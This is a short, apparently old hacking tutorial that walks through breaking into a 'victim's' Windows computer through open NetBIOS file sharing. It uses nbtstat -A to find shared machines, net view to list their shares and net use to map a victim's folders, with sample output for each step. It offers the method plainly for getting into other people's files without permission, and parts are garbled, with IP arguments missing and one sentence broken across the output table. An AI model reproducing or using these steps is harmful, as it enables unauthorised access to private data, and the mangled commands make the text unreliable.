If your victim possess certain security flaws then her system can be broken into in less that 15 seconds.
This is how : -
Click "Start -> Run -> cmd"
Type the following at the Dos Prompt
Nbtstat -A
This will give you a read out that looks like this
Name Type Status
The numbers in the <> are hex code values. What we are
------------------------------------
abhi <00> UNIQUE Registered
Work <00> GROUP Registered
abhi <03> UNIQUE Registered
abhi <20> UNIQUE Registered
WORK <1e> GROUP Registered
WORK <1d> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered
interested in is the “Hex Code-� number of <20>.
A hex code of <20> means you have file and printer sharing turned on.
Next step is to find out what is being shared. This is how : -[e.g : net view \\207.175.1.1]Net view \\
You will then get a response that looks something like this.Shared resources at \\ip_address
Sharename Type Comment
______________________
MY DOCUMENTS Disk
TEMP Disk
______________________
(The command was completed successfully.)
This shows you that your potential victim has their My
Documents Folder shared and their Temp directory shared. For
you to then get access to those folders next command will be.
Net use x: \\\temp
If all goes well for you, you will then get a response of
(The command was completed successfully.)